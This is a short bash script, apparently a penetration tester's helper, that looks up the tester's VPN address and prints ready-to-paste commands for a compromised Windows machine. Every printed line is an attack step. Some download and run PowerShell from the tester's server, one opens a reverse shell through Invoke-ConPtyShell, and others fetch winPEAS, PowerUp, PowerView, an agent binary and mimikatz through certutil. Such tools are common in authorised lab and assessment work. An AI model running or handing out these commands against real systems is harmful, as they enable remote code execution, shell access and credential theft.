#!/bin/bash

# Windows Privilege Escalation Server companion by sender https://github.com/allendemoura

# Regular Colors
BLACK='\033[0;30m'
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[0;33m'
BLUE='\033[0;34m'
MAGENTA='\033[0;35m'
CYAN='\033[0;36m'
WHITE='\033[0;37m'

# Text Attributes
RESET='\033[0m' # No Color

# Check if the argument is provided
if [ -n "$1" ]; then
    # Argument is provided, set port variable
    port=":$1"
else
    # Argument is not provided, set port variable to an empty string
    port=""
fi

# vars
myip=$(ip addr show tun0 | grep -oP 'inet \K[\d.]+')
address="${myip}${port}"
description="some convenient web request commands to copy/paste\n"
commands=(
  "echo IEX(New-Object Net.WebClient).DownloadString(\"http://${address}/scripts/stage.ps1\") | powershell -noprofile"
  "IEX(IWR http://$address/scripts/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell $myip 443"
  "wget ${address}/bin/winpeas.exe -o winpeas.exe"
  "IEX(IWR -Uri \"http://$address/scripts/PowerUp.ps1\" -UseBasicParsing)"
  "wget ${address}/bin/agent.exe -o agent.exe"
  "certutil -urlcache -split -f \"http://${address}/bin/mimikatz.exe\" mimi.exe"
  "IEX(IWR -Uri \"http://$address/scripts/PowerView.ps1\" -UseBasicParsing)"
)
# Set the terminal title
echo -ne "\033]0;WPEserv\007"

# print italicized description
echo -e "\033[3m${description}\e[0m"

# Iterate over commands and print them with alternating colors
for i in "${!commands[@]}"; do
  command="${commands[$i]}"
  color=$([ $((i % 2)) -eq 0 ] && echo "$YELLOW" || echo "$GREEN")
  echo -e "${color}${command}${RESET}"
done
